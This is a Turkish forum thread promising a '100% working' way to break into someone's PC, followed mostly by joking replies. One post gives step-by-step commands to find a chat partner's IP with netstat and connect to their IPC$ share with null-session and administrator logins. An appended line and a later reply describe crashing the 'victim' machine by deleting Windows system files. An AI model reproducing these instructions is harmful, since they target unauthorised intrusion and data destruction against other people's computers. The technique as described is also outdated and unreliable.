pc ye girme ve hack %100 çalışıyor

Sponsorlu Bağlantılar

Doğan

Üye
abi sen kendini aşmıssın yaaa :D:D:D:D:D:D:D

u.conay

u.conay

Üye
:ehe:ehe:ehe

SOLIDMEMO96

SOLIDMEMO96

Üye
denemek lazım internet kafede ama hemen kaçmak da gerekir (malumunuz,internet kafe kuralları)

06uz

Üye
abi okulda devamsızlıkları silsem yeter bana ya

CryDaqqeR

CryDaqqeR

Üye
Hacker oldum :)

escalliburr

Üye
ya işinizmi yok be kardeşim bilen birileri yazsın:yuru

passiv€ aggressiv€

Üye
:ehe:ehe:ehe:ehe

By Azad

Üye
Msn den Karşı Pc ye Girme
1.

arkadaşlar önce adamın IP numarasını bulalım şimdi pcsine gireceğiniz adamla konuşma penceresi açın ama sadece pcsine gireceğiniz adamla konusma açın yoksa hedefleri karışır.. ondan sonra bilgisayarına gireceğiniz adama bir Dosya(farketmez) gönderin adam onu kabul edip yüklenirken aşşagıdaki komutları yapın:
2.
baslat\çalıştır\cmd sonra oraya netstat -n yazın hangi numaranın yanında ESTABLISHED yazıyorsa o numara kurbanýn IP numarasıdır..
3.
şimdi geldik pcye girmeye tekrar baslat\çalıştır\cmd yapın ondan sonra oraya net view \\kurbanın ip nosu yazın ondan sonra net use \\kurbanın ip nosu\ipc$ /u:"" "" bu komutu girdikten sonra hedef tamalandı diye birşey çıkar... ondan sonra net use \\kurbanýn ip nosu\ipc$ /delete yapýn ondan sonrada net use \\kurbanýn ip nosu\ipc$ /u:"administrator" " kurbanın ip nosu" yaptıktan sonra pcye sızmış oluyosunuz. fakat çıkarken net use \\kurbanın ip nosu\ipc$ /delete yapıp çıkıyon....

Haydi Bakalım Bol Şans:P:

--------------- Ekleme ---------------

Çökertmek İçin Sistemin Ana Dosyaları Üzerinde Oynama Yapın(Silseniz Pc Karşı Kişiye Uyarı Vercektir..)

dada21

dada21

Üye
:kop::kop::kop:

aZRaiL_aLi

aZRaiL_aLi

Üye
En kral hacker benim artık oleeey!.. :naughty:

(Dikkatli olun sizide hacker'leyebilirim... :))

maydin95

Üye
arkadaşlar bende pcye girerken şifre istiyor ne yapacam onun içinde bir program varmı :sn:

nyfe

Üye
benim pc nin kasası ufak o yüzden pc nin içine giremedin. acil yardım:agla

Cihandar

Cihandar

Üye
saol!!!

Dawn

Dawn

Emekli Yönetici
hahah :):):

resmigenc

resmigenc

Üye
çökmedi...:)

silop_kms

silop_kms

Üye
klasorü silmene gerek yok windows klasör içinden bir dosya sil daha sonra bilgisayarı kapat aç açıldığında yeni bir açılış mesajı gelecek.... mesaj bu:
windows '................'dosya eksikliğinden oturumu açamadı.....:ehe:ehe

kıvanceses

Üye
dowlad nerde hacım bunu :D

Üst Alt